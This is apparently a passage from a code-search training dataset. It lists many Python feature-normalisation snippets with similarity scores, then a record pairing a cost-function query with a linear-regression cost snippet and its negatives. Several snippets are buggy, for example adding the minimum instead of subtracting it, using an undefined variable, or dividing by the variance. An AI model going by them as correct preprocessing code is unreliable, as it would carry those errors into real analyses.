dataframe\n feats = tmp.drop(columns=['year', 'county'])\n fmax = feats.max()\n fmin = feats.min() \n # normalize the feature matrix\n feats = (feats - fmin) / (fmax - fmin)\n tmp[feats.columns] = feats\n\n return tmp", "def normalize_data(self, df):\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.train_df[feature_name].max()\n min_value = self.train_df[feature_name].min()\n result[feature_name] = (\n df[feature_name] - min_value) / (max_value - min_value)\n return result", "def normalize_feature_data(feature, X_train, X_valid, X_test):\r\n if type(feature) == list:\r\n for i, f in enumerate(feature):\r\n \r\n if f in __normalizing_features__:\r\n stds = np.std(X_train[i], axis=0)\r\n stds[stds==0.0] = 1.0\r\n means = np.mean(X_train[i], axis=0)\r\n X_train[i] = (X_train[i]-means)/stds\r\n X_valid[i] = (X_valid[i]-means)/stds\r\n X_test[i] = (X_test[i]-means)/stds\r\n else:\r\n if feature in __normalizing_features__:\r\n stds = np.std(X_train, axis=0)\r\n stds[stds==0.0] = 1.0\r\n means = np.mean(X_train, axis=0)\r\n X_train = (X_train-means)/stds\r\n X_valid = (X_valid-means)/stds\r\n X_test = (X_test-means)/stds\r\n \r\n return X_train, X_valid, X_test", "def _localNormalizeData(self,values,names,feat):\n self.muAndSigmaFeatures[feat] = (0.0,1.0)", "def featureNormalize(X):\n\n mu = np.mean(X, axis=0)\n sigma = np.std(X, axis=0)\n\n X_normalized = (X - mu) / sigma\n\n return X_normalized, mu, sigma", "def normalize(self):\n self._data /= self.norm()", "def feature_normalization(train, test):\n (N,p) = np.shape(train)\n mins = np.amin(train,axis=0)\n maxs = np.amax(train,axis=0) + mins\n train = (train + mins)/maxs\n test = (test + mins)/maxs\n return train, test", "def feature_normalization(train, test):\n mins_of_features = np.amin(train, axis=0)\n maxs_of_features = np.amax(train, axis=0)\n range_of_features = maxs_of_features-mins_of_features\n range_of_features[range_of_features==0] = 1\n \n train_normalized = (train - mins_of_features)/range_of_features\n test_normalized = (test - mins_of_features)/range_of_features\n \n return (train_normalized, test_normalized)", "def normalize_features(df):\n mu = df.mean()\n sigma = df.std()\n\n if (sigma == 0).any():\n raise Exception(\"One or more features had the same value for all samples, and thus could \" +\n \"not be normalized. Please do not include features with only a single value \" +\n \"in your model.\")\n df_normalized = (df - df.mean()) / df.std()\n\n return df_normalized, mu, sigma", "def featureNormalize(X):\n X_norm, mu, sigma = X,0,0\n # ====================== YOUR CODE HERE ======================\n # Instructions: First, for each feature dimension, compute the mean\n # of the feature and subtract it from the dataset,\n # storing the mean value in mu. Next, compute the\n # standard deviation of each feature and divide\n # each feature by it's standard deviation, storing\n # the standard deviation in sigma.\n #\n # Note that X is a matrix where each column is a\n # feature and each row is an example. You need\n # to perform the normalization separately for\n # each feature.\n #\n # Hint: You might find the 'mean' and 'std' functions useful.\n #\n \n # get the number of features in X and norm 1 col at a time \n \n for i in range(X.shape[1]):\n mu_i = np.mean(X[:,i]) #calculate mean for each col\n sigma_i = np.std(X[:,i]) #calculate sigma for each col\n X_norm[:,i] = ((X_norm[:,i] - mu_i) / sigma_i) #norm data in col\n \n # want to make an array of all values of mu and sigma\n if i == 0: \n mu = mu_i\n sigma = sigma_i\n else:\n mu = np.append(mu,mu_i)\n sigma = np.append(sigma,sigma_i)\n # ============================================================\n \n return X_norm, mu, sigma", "def normalize_dataset(self):", "def featureNormalization(X):\n mean=np.hstack(np.mean(X[:,0]),np.mean(X[:,1]),np.mean(X[:,2]))\n std=np.hstack(np.std(X[:,0]),np.std(X[:,1]),np.std(X[:,2]))\n \n X_norm = (X - mean)/std\n \n return X_norm", "def feature_normalization(train, test):\n # TODO\n col_max = np.apply_along_axis(max, 0, train)\n col_min = np.apply_along_axis(min, 0, train)\n\n train_normalized = (train-col_min)/(col_max-col_min)\n test_normalized = (test-col_min)/(col_max-col_min)\n \n return train_normalized, test_normalized", "def normalize(dataset):\n return normalize_standard_deviation(normalize_mean(dataset))", "def normalize_feature(df):\n return df.apply(lambda column: (column - column.mean()) / column.std())", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def normalize(self, X):\n return X - X.mean()", "def normalize_features(array):\n \n array_normalized = (array-array.mean())/array.std()\n mu = array.mean()\n sigma = array.std()\n\n return array_normalized, mu, sigma", "def normalize_X(X):\n scaler = preprocessing.StandardScaler()\n X = scaler.fit_transform(X)\n return X", "def normalize(self):\n self._vectors = [vector.normalized() for vector in self._vectors]", "def normalize_train_data(train_data, hter=False):\n feats = train_data[:, :-1]\n labels = train_data[:, -1]\n if hter:\n labels_pw = labels\n else:\n labels_pw = labels / feats[:, 1]\n scaler = pp.StandardScaler()\n scaler.fit(feats)\n norm_feats = scaler.transform(feats)\n return np.concatenate((norm_feats, labels_pw[:, None]), axis=1), scaler", "def normalize(feats, train_nid, dtype=np.float32):\n train_feats = feats[train_nid]\n scaler = preprocessing.StandardScaler()\n scaler.fit(train_feats)\n feats = scaler.transform(feats)\n return feats.astype(dtype)", "def normalize_features(self, scaler: StandardScaler = None, replace_nan_token: int = 0) -> StandardScaler:\n if len(self.data) == 0 or self.data[0].features is None:\n return None\n\n if scaler is not None:\n self.scaler = scaler\n\n elif self.scaler is None:\n features = np.vstack([d.features for d in self.data])\n self.scaler = StandardScaler(replace_nan_token=replace_nan_token)\n self.scaler.fit(features)\n\n for d in self.data:\n d.set_features(self.scaler.transform(d.features.reshape(1, -1))[0])\n\n return self.scaler", "def normalize_data(x):\n mvec = x.mean(0)\n stdvec = x.std(axis=0)\n \n return (x - mvec)/stdvec", "def normalize_data(x):\n mvec = x.mean(0)\n stdvec = x.std(axis=0)\n \n return (x - mvec)/stdvec", "def normalize(dataset):\n minVals = dataset.min(axis=0)\n maxVals = dataset.max(axis=0)\n factors = maxVals-minVals\n num = dataset.shape[0]\n norm_data = (dataset - np.tile(minVals,(num,1)))/np.tile(factors,(num,1)) \n return norm_data", "def normalize(feats_Xy, trace_normalize=True, data=None):\n feats, labels = zip(*feats_Xy)\n if data is None:\n train_f = feats[0]\n m = train_f.mean(axis=0)\n s = np.maximum(train_f.std(axis=0), 1e-8)\n else:\n m = data['train_mean']\n s = data['train_std']\n feats = [(f - m) / s for f in feats]\n if trace_normalize:\n if data is None:\n train_f = feats[0]\n tr = np.maximum(np.sqrt((train_f**2).sum(axis=1)).mean(), 1e-8)\n else:\n tr = data['trace']\n else:\n tr = None\n if trace_normalize:\n feats = [f / tr for f in feats]\n feats_Xy = tuple(zip(feats,labels))\n return feats_Xy + (m, s, tr)", "def standardiser(self):\n # Select only numeric features first\n\n #self.X = self.data.loc[:, self.data.columns != self.target].values\n numeric_columns = []\n for col in self.X.columns:\n if self.X[col].dtype!='object':\n numeric_columns.append(col)\n scaler = preprocessing.StandardScaler().fit(self.X[numeric_columns]) \n # Now we can standardise\n self.X[numeric_columns] = scaler.transform(self.X[numeric_columns])", "def normalize_data(self):\r\n # quantify data for each column except classification column for noise reduction\r\n for column_header in self.classification_training_data.columns:\r\n if column_header == \"Class\":\r\n continue\r\n if column_header == \"Age\":\r\n bin_size = 2\r\n elif column_header == \"Ht\":\r\n bin_size = 5\r\n else:\r\n bin_size = 1\r\n for idx in self.classification_training_data.index:\r\n self.classification_training_data.at[idx, column_header] = math.floor(\r\n self.classification_training_data[column_header][idx] / bin_size) * bin_size", "def _preprocess(self, data, normalize=False) -> np.ndarray:\n \n preprocessor = StandardScaler() if not normalize else Normalizer()\n\n data = preprocessor.fit_transform(data)\n \n return data", "def normalize_feature_vector(self, features):\n\n features_normalized = features / np.repeat(np.linalg.norm(features, ord=2, axis=1).reshape(\n (features.shape[0], 1)), features.shape[1], axis=1)\n\n return features_normalized", "def normalize_feature(feature):\n # Compute mean and standard deviation, and return (x-mu)/std\n mean = np.mean(feature)\n std = np.std(feature)\n return np.divide(np.subtract(feature, mean), std)", "def specific_normalization(df):\n # Need to scale some vars. This is done using a StandardScaler from sklearn package\n scaler = StandardScaler()\n df['Pclass'] = df['Pclass'].astype('float64')\n df['Family'] = df['Family'].astype('float64')\n # .reshape(-1, 1) is mandatory otherwise an exception is thrown (as 'data has a single feature')\n df['Pclass'] = scaler.fit_transform(df['Pclass'].values.reshape(-1, 1))\n df['Family'] = scaler.fit_transform(df['Family'].values.reshape(-1, 1))\n\n return df", "def normalize_features(self, scaler: StandardScaler = None, replace_nan_token: int = 0) -> StandardScaler:\n raise NotImplemetedError(\"AtomisticDataset.normalize_features is not implemeneted.\")\n # if len(self.data) == 0 or self.data[0].features is None:\n # return None\n #\n # if scaler is not None:\n # self.scaler = scaler\n #\n # elif self.scaler is None:\n # features = np.vstack([d.features for d in self.data])\n # self.scaler = StandardScaler(replace_nan_token=replace_nan_token)\n # self.scaler.fit(features)\n #\n # for d in self.data:\n # d.set_features(self.scaler.transform(d.features.reshape(1, -1))[0])\n #\n # return self.scaler", "def set_normalization(self, dataloader):\n mean = 0\n square = 0\n for (data_in, _) in dataloader:\n mean += data_in.mean()\n square += data_in.pow(2).mean()\n\n mean /= len(dataloader)\n square /= len(dataloader)\n std = np.sqrt(square - mean ** 2)\n\n # The input data should be roughly normally distributed after\n # passing through net_fixed.\n self.scale_in.bias.data.fill_(- mean / std)\n self.scale_in.weight.data.fill_(1 / std)", "def __call__(self, features):\n norm = []\n for data in features:\n if all(x == 0 for x in data):\n norm.append(data)\n else:\n scale = sum(x*x for x in data) ** 0.5\n normalized_data = [x / scale for x in data]\n norm.append(normalized_data)\n \n return norm", "def df_normalizer(df):\n df = tf.keras.utils.normalize(df, axis=1)\n\n return df", "def normalize_train_data(self, data_vector, clf_type = \"generic\"):\n\t\tassert(clf_type in [\"generic\", \"specific\"])\n\n\t\tif clf_type == \"generic\":\n\t\t\tself.mean_per_dim_generic = []\n\t\t\tmean_per_dim = self.mean_per_dim_generic\n\t\t\tself.std_per_dim_generic = []\n\t\t\tstd_per_dim = self.std_per_dim_generic\n\t\telse:\n\t\t\tself.mean_per_dim_specific = []\n\t\t\tmean_per_dim = self.mean_per_dim_specific\n\t\t\tself.std_per_dim_specific = []\n\t\t\tstd_per_dim = self.std_per_dim_specific\n\n\t\tper_dim = zip(*data_vector)\n\n\t\tfor i in xrange(len(per_dim)):\n\t\t\n\t\t\tm = np.float64(sum (per_dim[i]) / float (len(per_dim[i])))\n\t\t\ts = np.std(per_dim[i])\n\t\t\tper_dim[i] -= m\n\t\t\tif s>0:\n\t\t\t\tper_dim[i] /= s\n\t\t\n\t\t\tmean_per_dim.append(m)\n\t\t\tstd_per_dim.append(s)\n\t\n\t\tdata_vector = zip(*per_dim)\n\t\tfor i in xrange(len(data_vector)):\n\t\t\tdata_vector[i] = list(data_vector[i])\n\n\t\treturn data_vector", "def normalize(X):\n\tX = X - np.mean(X,axis=1)[:,np.newaxis]\n\tX = X/np.std(X,axis=0)[np.newaxis,:];\n\tX = X - np.mean(X,axis=0)[np.newaxis,:]\n\treturn X", "def normalize_data(data=None):\n # Data pre-processing\n n = data.shape[0]\n for i in range(n):\n xx = data[i,:,:]\n xx -= np.mean(xx) # Centering in 0\n xx /= np.linalg.norm(xx) # Normalizing to 1\n data[i] = xx # Affect value\n return data", "def normalize_data(data):\n mean = np.mean(data)\n std = np.std(data)\n return (data - mean) / std", "def normalize_feats(self):\n if self.feats is not None:\n self.feats = normalize(self.feats, axis=1)", "def normalize(data):\n data = lowercase(data)\n data = remove_punct(data)\n data = remove_apostrophes(data)\n data = remove_stopwords(data)\n data = num_to_words(data)\n data = lemmatize(data)\n data = stemming(data)\n data = remove_punct(data)\n data = num_to_words(data)\n data = lemmatize(data)\n data = stemming(data)\n data = remove_punct(data) #done again to remove hyphens produced by num2words\n data = remove_stopwords(data) #done agan to remove stopwords produced by num2words\n return data", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def normalize_datasets(train, test):\n columns = train.columns[:-1]\n train[columns] = (train[columns] - train[columns].mean()) / (train[columns].max() - train[columns].min())\n test[columns] = (test[columns] - test[columns].mean()) / (test[columns].max() - test[columns].min())\n\n return train, test", "def normalise_features(customer_df, features_to_normalise: List[str] = ['recency', 'frequency', 'total_spend']):\n \n for feature in features_to_normalise:\n if feature in customer_df.columns:\n customer_df[feature] = PropensityModel.normalise_series(customer_df[feature])\n return customer_df", "def normalize_labels(self):\n self.y_mean, self.y_std = du.get_mean_std(self.y_train)\n self.y_train = du.normalize(self.y_train, self.y_mean, self.y_std)\n if self.x_test is not None and self.y_test is not None:\n self.y_test = du.normalize(self.y_test, self.y_mean, self.y_std)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def __call__(self, features: List[List[float]]) -> List[List[float]]:\n normalized_features = []\n for feature in features:\n magnitude = np.linalg.norm(feature)\n if magnitude != 0:\n feat = [a/magnitude for a in feature]\n normalized_features.append(feat)\n else:\n normalized_features.append(feature)\n return normalized_features\n #raise NotImplementedError", "def normalize_data(self, data):\n self.find_mean_std(data)\n return (data - self._data_mean) / self._data_std", "def normalize_data(data, class_name):\n row_count = len(data.index)\n col_count = len(data.columns)\n normalized_data = []\n\n normalized_class_list = []\n class_list = data.iloc[(range(row_count)), 0].values\n for value in class_list:\n normalized_class_list.append(1 if value == class_name else 0)\n normalized_data.append(normalized_class_list)\n\n for index in range(1, col_count):\n feature_list = data.iloc[(range(row_count)), index].values\n normalized_data += normalize(feature_list)\n \n return normalized_data", "def normalizeFeatures(lp):\n # optimized for any sized feature vector\n numFeatures = len(lp.features)\n featureList = []\n for i in range(numFeatures):\n normalizedFeature = (lp.features[i] - meanOfFeatures[i])/stdDevFeatures[i]\n featureList.append(normalizedFeature)\n returnLabeledPoint = LabeledPoint(lp.label, featureList)\n return returnLabeledPoint", "def de_normalize_data(self, df):\n if len(df) == 0:\n return df\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.permitted_range[feature_name][1]\n min_value = self.permitted_range[feature_name][0]\n result[feature_name] = (\n df[feature_name]*(max_value - min_value)) + min_value\n return result", "def __call__(self, features: List[List[float]]) -> List[List[float]]:\n # raise NotImplementedError\n features_normalized = []\n for feature in features:\n norm = np.linalg.norm(feature)\n if norm != 0:\n feature_normalized = feature/norm\n features_normalized.append(feature_normalized.tolist())\n else:\n features_normalized.append([0] * len(feature))\n return features_normalized", "def normalize(data):\n\n p_means = np.mean(data,axis=0)\n p_vars = np.var(data,axis=0)\n\n # subtract dc component\n data = data-p_means\n\n # contrast normalize \n data = data/np.sqrt(p_vars+10) # plus 10 to account for small variances\n \n return data", "def normalize(data):\n data = numpy.asmatrix(data)\n std_devs = numpy.std(data, axis=1)\n std_devs[std_devs == 0] = 1 # prevent div by 0\n return (data - numpy.mean(data, axis=1)) / std_devs", "def _transform(self, data):\r\n mean, variance = self._input_statistics.overall_feature_moments\r\n return (data - mean) / variance", "def normalizeData(self, data):\n return _normalizeData(data)", "def normalizeData(self, data):\n return _normalizeData(data)", "def normalize(data):\n row = np.size(data, 0) # number of data points\n col = np.size(data, 1) # dimensionality of data points\n for j in range(col):\n # find the average for each column\n col_sum = 0\n for i in range(row):\n col_sum = col_sum + data[i][j]\n col_sum = col_sum / row\n # subtract the average from each value in the column\n for i in range(row):\n data[i][j] = data[i][j] - col_sum\n return data", "def normalize(data):\n row = np.size(data, 0) # number of data points\n col = np.size(data, 1) # dimensionality of data points\n for j in range(col):\n # find the average for each column\n col_sum = 0\n for i in range(row):\n col_sum = col_sum + data[i][j]\n col_sum = col_sum / row\n # subtract the average from each value in the column\n for i in range(row):\n data[i][j] = data[i][j] - col_sum\n return data", "def normalize(raw_feature_list):\n result={}\n for feature in raw_feature_list:\n mean=statistics.mean(raw_feature_list[feature])\n stdev=statistics.pstdev(raw_feature_list[feature])\n print(feature,':','mean:',mean,'stdev:',stdev)\n for i in range(len(raw_feature_list[feature])):\n raw_feature_list[feature][i]-= mean\n raw_feature_list[feature][i]/= stdev", "def normalize_test_vector(self, data_vector, clf_type = \"generic\"):\n\n\t\tassert(clf_type in [\"generic\", \"specific\"])\n\n\t\tif clf_type == \"generic\":\n\t\t\tmean_per_dim = self.mean_per_dim_generic\n\t\t\tstd_per_dim = self.std_per_dim_generic\n\t\telse:\n\t\t\tmean_per_dim = self.mean_per_dim_specific\n\t\t\tstd_per_dim = self.std_per_dim_specific\n\n\n\t\tfor i in xrange(len(mean_per_dim)):\n\t\t\tdata_vector[i] -= mean_per_dim[i]\n\t\t\tdata_vector[i] /= std_per_dim[i]\n\t\t\n\t\n\t\treturn data_vector", "def normalize(self):\n self.desc += \", normalize\"\n self._vecs /= np.linalg.norm(self._vecs, axis=1)[:, np.newaxis]\n self.reindex()", "def normalise(self):\n return self / self.mean(axis=1).reshape(self.shape[0], 1)", "def scalarNormalizer(df):\r\n arr=dict()\r\n for col in CONT_FEATURES_COL_TO_USE:\r\n mean, std =df[col].mean(), df[col].std()\r\n df[col]=df[col].apply(lambda x: (x-mean)/std)\r\n arr[col] = [mean, std]\r\n json.dump(arr, open('normalize.json', 'w'))\r\n return df", "def standardize_data(X_train, X_test):\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n # apply same transformation to test data\n X_test = scaler.transform(X_test)\n return X_train, X_test", "def _normalize(self):\r\n self.dataframe['norm_intensity'] = self.dataframe['intensity']\r\n self.dataframe['norm_intensity'] -= self.dataframe['norm_intensity'].min()\r\n self.dataframe['norm_intensity'] /= self.dataframe['norm_intensity'].max() * 0.01", "def normalize(self, df):\n return (df - df.mean()) / (df.max() - df.min())", "def normalize(self, attr_name): # DONE\n self.data[attr_name] = (self.data[attr_name] - self.data[attr_name].mean()) / self.data[attr_name].std()", "def normalize(data):\n # normalize data and return\n # https://stackoverflow.com/questions/29661574/normalize-numpy-array-columns-in-python\n return (data - data.min(axis=0)) / data.ptp(axis=0)", "def normalize_ds(dataset):\n dataset = copy.copy(dataset)\n\n dim_dataset = dataset.shape\n\n for n_row in range(dim_dataset[0]):\n k = dataset[n_row,:]\n k_norm =(k - np.min(k))/(np.max(k) - np.min(k))\n dataset[n_row,:] = k_norm\n\n return dataset", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def test_normalization_scalar(features: List[List[float]]) -> List[List[float]]:\n normalized_features = []\n for feature in features:\n sum_squares = 0\n for i in feature:\n sum_squares += i * i\n sum_squares_root = np.sqrt(sum_squares)\n if sum_squares == 0:\n normalized_features.append(feature)\n else:\n normalized_features.append([x / sum_squares_root for x in feature])\n return normalized_features", "def _normalize(self, x):\n # TODO: imagenet normalization\n\n return x", "def normalize(self):\n self.number_of_vectors = self.values.shape[0]\n norm_2 = np.linalg.norm(self.values, axis=1)\n norm_1 = np.sum(self.values_planar, axis=1)\n norm_2 = np.repeat(norm_2, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_1 = np.repeat(norm_1, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_2[norm_2 == 0] = np.finfo(float).eps\n self.values = np.divide(self.values, norm_2)\n self.values_planar = np.divide(self.values_planar, norm_1)", "def normalise(self):\n fitness_sum = np.sum(self.fitness)\n for i in range(self.loops):\n self.normalised_fitness[i] = self.fitness[i] / fitness_sum", "def _normalize_data(self, method='median'):\n pos = np.unique(self.pos.values())\n if hasattr(self, '_raw_data'):\n # data has been already normalized; take original data\n self.data = copy.deepcopy(self._raw_data)\n else:\n # preserve original calculated data\n self._raw_data = copy.deepcopy(self.data)\n\n for var in self.variables:\n for p in pos:\n # calculate multimodel mean/median\n xm = self._get_mean_value(p, var, method=method)\n for k in self.data:\n if (self.pos[k] == p) & ('_' + var + '_' in k):\n self.data[k] = (self.data[k] - xm) / xm # see Glecker et al, eq.2", "def normalize_transform():\n\n # Default for PyTorch's pre-trained models\n return transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])", "def normalize(X):\n # z-score\n mean = np.mean(X, axis=(0, 1, 2, 3))\n std = np.std(X, axis=(0, 1, 2, 3))\n # avoid dividing zero by adding a very small number\n X = (X - mean) / (std + 1e-7)\n\n return X", "def normalize_test_data(test_data, scaler):\n feats = test_data[:, :-1]\n labels = test_data[:, -1]\n labels_pw = labels / feats[:, 1]\n norm_feats = scaler.transform(feats)\n return np.concatenate((norm_feats, labels_pw[:, None]), axis=1)", "def normalize(x):\n # TODO: Implement Function\n data_max = np.max(x)\n data_min = np.min(x)\n x = (x - data_min) / (data_max - data_min)\n return x", "def normalize_attributions(self, att_list, positive=False, normalizer='MinMaxScaler'):\n all_values = np.concatenate(att_list)\n all_values = all_values[all_values > 0] if positive else all_values\n\n if normalizer == 'QuantileTransformer':\n normalizer = sklearn.preprocessing.QuantileTransformer()\n elif normalizer == 'MaxAbsScaler':\n normalizer = sklearn.preprocessing.MaxAbsScaler()\n else:\n normalizer = sklearn.preprocessing.MinMaxScaler()\n normalizer.fit(all_values.reshape(-1, 1))\n \n new_att = []\n for att in att_list:\n normed_nodes = normalizer.transform(att.reshape(-1, 1)).ravel()\n new_att.append(normed_nodes)\n return new_att", "def normalize(self):\n if self.normed:\n return\n self._normalize()", "def normalize(self, x, train=True):\n if train is not None:\n mean, variance = tf.nn.moments(x, [0,1,2])\n assign_mean = self.mean.assign(mean)\n assign_variance = self.variance.assign(variance)\n with tf.control_dependencies([assign_mean, assign_variance]):\n return tf.nn.batch_norm_with_global_normalization(\n x, mean, variance, self.beta, self.gamma,\n self.epsilon, self.scale_after_norm)\n else:\n mean = self.ewma_trainer.average(self.mean)\n variance = self.ewma_trainer.average(self.variance)\n local_beta = tf.identity(self.beta)\n local_gamma = tf.identity(self.gamma)\n return tf.nn.batch_norm_with_global_normalization(\n x, mean, variance, local_beta, local_gamma,\n self.epsilon, self.scale_after_norm)", "def normalization(self, set):\n\n #epsilon = np.random.randn(np.array(set).shape[0],np.array(set).shape[1])\n #variance = np.var(set+epsilon, axis=0)\n mean = np.mean(set, axis=0)\n variance = np.var(set, axis=0)\n set = (set - mean)/variance\n\n return set", "def fit(self, dataset, labels):\n self.dataset = dataset\n self.labels = labels\n self.normalization_n = []\n self.normalization_d = []\n self.first_title = list(self.dataset.keys())[0]\n for ind in range(len(self.dataset[self.first_title])):\n self.normalize_features(self.dataset, ind)", "def _scale_features(self, features):\n assert isinstance(features, np.ndarray), \"Input is not a numpy array!\"\n\n return self.scaler.transform(features.reshape(1, -1))", "def normalize(df, excludes):\n\n result = df.copy()\n for feature_name in df.columns:\n if feature_name in excludes:\n continue\n try:\n max_value = df[feature_name].max()\n min_value = df[feature_name].min()\n if max_value == min_value:\n min_value = 0\n result[feature_name] = (df[feature_name] - min_value) / (max_value - min_value)\n result[feature_name] = result[feature_name].apply(lambda x: round(abs(x), 4))\n except:\n LOGGER.error(f'Error normalizing feature: {feature_name}')\n raise RuntimeError(f'Error normalizing feature: {feature_name}')\n return result", "def normalize_data(data_frame):\n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(data_frame)\n return pd.DataFrame(x_scaled)", "def normalize(data):\n data_range = data.max() - data.min()\n #if data_range == 0.:\n # sys.exit(\"data.max() - data.min() == 0. !\")\n if stddev != 0.:\n data = (data - data.min()) / data_range\n\n return data" ]
[ "0.79551655", "0.79528546", "0.7853807", "0.77867204", "0.7698743", "0.76595855", "0.76581943", "0.7635334", "0.76207286", "0.7542891", "0.75298584", "0.74793464", "0.74740255", "0.7413795", "0.7318681", "0.73162293", "0.7313582", "0.72916085", "0.72567785", "0.7242953", "0.7227996", "0.7196083", "0.7143606", "0.7109897", "0.70956826", "0.7046461", "0.7024581", "0.70157343", "0.6989634", "0.69502217", "0.6945149", "0.6928351", "0.6928351", "0.69184875", "0.69118637", "0.69086367", "0.68908876", "0.6881575", "0.6873502", "0.68728405", "0.68711287", "0.68684787", "0.6859474", "0.68510824", "0.6840289", "0.6801087", "0.67932326", "0.678247", "0.67806756", "0.67790633", "0.67766184", "0.67654705", "0.6760335", "0.6756144", "0.67541695", "0.67362463", "0.671197", "0.6708384", "0.66970205", "0.6691158", "0.6652749", "0.66510284", "0.6644678", "0.66443783", "0.66319746", "0.6630462", "0.6630462", "0.662491", "0.662491", "0.66037834", "0.6598514", "0.6583471", "0.6573423", "0.6559674", "0.6529994", "0.65205336", "0.6514339", "0.6506325", "0.65013146", "0.6500694", "0.64780563", "0.64581656", "0.645138", "0.64500743", "0.6448489", "0.6444722", "0.64442647", "0.6440666", "0.643224", "0.6419304", "0.6414838", "0.64084756", "0.63965565", "0.6373919", "0.63693774", "0.63293105", "0.63283086", "0.6325928", "0.63210505" ]
0.7320142
15
Compute the cost function given a set of features / values, and the values for our thetas.
def compute_cost(features, values, theta): # your code here error = (values - features.dot(theta)) cost = error.dot(error) return cost
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_cost(features, values, theta):\r\n m = len(values)\r\n sum_of_square_errors = numpy.square(numpy.dot(features, theta) - values).sum()\r\n cost = sum_of_square_errors / (2*m)\r\n\r\n return cost", "def compute_cost(features, values, theta):\n m = len(values)\n sum_of_square_errors = np.square(np.dot(features, theta) - values).sum()\n cost = sum_of_square_errors / (2 * m)\n\n return cost", "def compute_cost(features, values, theta):\n\n npoints = len(values)\n sum_of_square_errors = np.square(np.dot(features, theta) - values).sum()\n cost = sum_of_square_errors / (2*npoints)\n\n return cost", "def compute(self, F, variables):\n s_0 = self.initial_state_generator(self.num_samples)\n a_0 = self.policy(s_0)\n a_t_plus_1 = a_0\n x_t = F.expand_dims(F.concat(s_0, a_0, dim=1), axis=1)\n cost = 0\n for t in range(self.n_time_steps):\n variables[self.model.X] = x_t\n res = self.model.Y.factor.predict(F, variables, targets=[self.model.Y], num_samples=self.num_samples)[0]\n s_t_plus_1 = res[0]\n\n cost = cost + self.cost_function(s_t_plus_1, a_t_plus_1)\n\n a_t_plus_1 = mx.nd.expand_dims(self.policy(s_t_plus_1), axis=2)\n x_t = mx.nd.concat(s_t_plus_1, a_t_plus_1, dim=2)\n total_cost = F.sum(cost)\n return total_cost, total_cost", "def _objective_function(self, thetas, X, Y):\n \n # Convert thetas vector to form total_cost can understand\n thetas = self.reshape_thetas(thetas, 'list')\n self.thetas = thetas\n \n # Get cost function value\n fval = self.total_cost(X, Y, thetas)\n \n # Get derivatives using back propagation\n Deltas = self.get_gradients(X, Y)\n dfval = self.reshape_thetas(Deltas, 'vector')\n \n return fval, dfval", "def cofiCostFunc(self,params, *args):\n\t\tY, R, num_users, num_products, num_features,l = args[0], args[1],args[2], args[3],args[4],args[5]\n\n\t\taux = params.reshape((num_products + num_users, num_features))\n\n\t\tX = aux[0:num_products , :]\n\n\t\tTheta = aux[num_products:, :] \n\n\t\ttest = np.dot(X,Theta.transpose())\n\t\ttest = test - Y\n\t\ttest = np.multiply(test , R)\n\t\ttest = np.power(test,2)\n\t\ttest = test.sum()\n\t\ttest = 0.5 * test\n\n\t\tJ = 0;\n\t\tregularization = (l * 0.5) * np.power(X,2).sum() + np.power(Theta,2).sum()\n\n\t\tJ = test# + regularization\n\n\t\treturn J", "def eval_cost(self, params, **kwargs):\n raise NotImplementedError", "def get_cost_updates(self):\n\n y = self.get_hidden_values()\n z = self.get_reconstructed_input(y)\n\n L = T.sum((self.x-z)**2, axis=1)\n\n cost = T.mean(L)\n\n return cost", "def costFun(self, x):\n\ttmp = x.reshape(self.inp_shape)\n\tc = np.float64(self.calcCost(np.asarray(tmp,dtype=np.float32))) + self.alpha * np.dot(x.T, x)\n\treturn c", "def cofiCostFunc(params, Y, R, num_users, num_movies, num_features, lbd):\n X = np.reshape(params[:num_movies*num_features], (num_movies, num_features))\n Theta = np.reshape(params[num_movies*num_features:], (num_users, num_features))\n\n # J=sum((X*Theta'-Y)^2) where R[i,j]==1\n h = X.dot(Theta.T)-Y\n M = h**2\n J = (M*R).sum()/2\n reg = lbd/2*((X**2).sum()+(Theta**2).sum())\n J = J+reg\n\n X_grad = (h*R).dot(Theta)+lbd*X\n Theta_grad = (h*R).T.dot(X)+lbd*Theta\n\n grad = np.r_[X_grad.flatten(), Theta_grad.flatten()]\n return J, grad", "def calculate_cost(theta_values, data):\n population = data[:,0]\n prices = data[:,1]\n total_error = 0\n for i in range(0,len(population)):\n x = array([[1],[population[i]]])\n hypothesis = theta_values.dot(x).flatten() \n squared_error = (hypothesis - prices[i])**2\n total_error += squared_error\n return .5*total_error/len(population) #division by m is just a scaling factor since we're only interested in whether this function is minimized", "def calcCostFun(self):\n\n self.start()\n F, K = self.model()\n \n return self.costFunction", "def cost_function(self, config_samples):\n cost = self.work_tracker(config_samples)\n return cost", "def cost_function(param, Y, R, n_features):\r\n # theta (user, feature), (943, 10): user preference\r\n # X (movie, feature), (1682, 10): movie features\r\n n_movie, n_user = Y.shape\r\n X, theta = deserialize(param, n_movie, n_user, n_features)\r\n\r\n inner = np.multiply(X @ theta.T - Y, R)\r\n\r\n return np.power(inner, 2).sum() / 2", "def compute_cost(AL, Y):\n pass", "def _cost_method(self, *args, **kwargs):\n\n cost_val = 0.5 * np.linalg.norm(self.obs_data - self.op(args[0])) ** 2\n\n if 'verbose' in kwargs and kwargs['verbose']:\n print(' - DATA FIDELITY (X):', cost_val)\n\n return cost_val", "def costFun(self, S, x):", "def cofiCostFunc(params, Y, R, num_users, num_movies, num_features, reg_lambda, returnCostOnly=False,\n 